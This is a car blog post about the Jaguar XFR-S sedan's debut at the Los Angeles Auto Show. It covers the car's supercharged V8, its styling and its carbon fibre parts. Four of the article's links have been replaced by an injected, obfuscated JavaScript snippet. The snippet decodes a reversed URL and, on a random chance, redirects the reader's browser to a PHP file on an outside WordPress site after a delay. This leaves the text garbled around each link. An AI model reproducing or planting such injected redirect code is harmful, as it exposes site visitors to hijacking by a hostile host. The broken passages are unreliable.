We’re still wandering the halls at the Los Angeles Auto Show and have stumbled across one seriously ferocious cat.
Jaguar chose this venue for the world debut of its XFR-S sedan, a hotter version of its already hot $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/jaguar-xfr-510bhp-wolf-in-a-pretty-red-dress/” target=”_blank”>Jaguar XFR. As the ‘S’ denotes (in what has become Jaguar’s version of the Mercedes-Benz $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/mercedes-c63-amg-coupe-black-the-slumbering-beast/” target=”_blank”>Black Series line), this newboy means serious business.
Indeed, the new XFR-S shares its 550hp Supercharged V8 with the XKR-S that debuted at last year’s Geneva Motor Show, and that makes it a serious monster. According to Jaguar, the new saloon will go from 0-100kph in a scant 4.4s. Not bad. Not bad at all.
Unsurprisingly, the XFR-S isn’t your typical example of Jaguar elegance and sophistication. For starters there’s the striking blue hue and some enormous front air intakes, while any and all shiny chrome detailing found on the standard XFR have been coated in a piano black finish.
From the side you can gawp at the massive 20-inch wheels and their ceramic polished finish, plus the pretty huge 380mm and 376mm rear rotors just behind them.
On the rear boot sits a huge carbon fibre rear wing, one that you’d be forgiven for thinking had been inspired by WRC Subaru in its heyday. When you’re reigning in 550 supercharged horses under the bonnet, you’re going to want improved downforce (and 30% stiffer dampers).
At the business end of things we find a carbon fibre splitter along with quad pipes, which seemed to have become standard fare in any serious performance model.
Anybody who’s read are thoughts on $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/jaguar-xkr-s-vs-skydive-thrill-seeker-part-one/” target=”_blank”>how a Jaguar XKR-S compares with jumping out of a plane can probably guess our reaction to the new XFR-S, but what do you think?
Oh, and in case you were wondering, $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/2012-la-auto-show-mercedes-sls-amg-black-yellow-fever/” target=”_blank”>there’s plenty more to come from crankandpiston and the LA Auto Show.
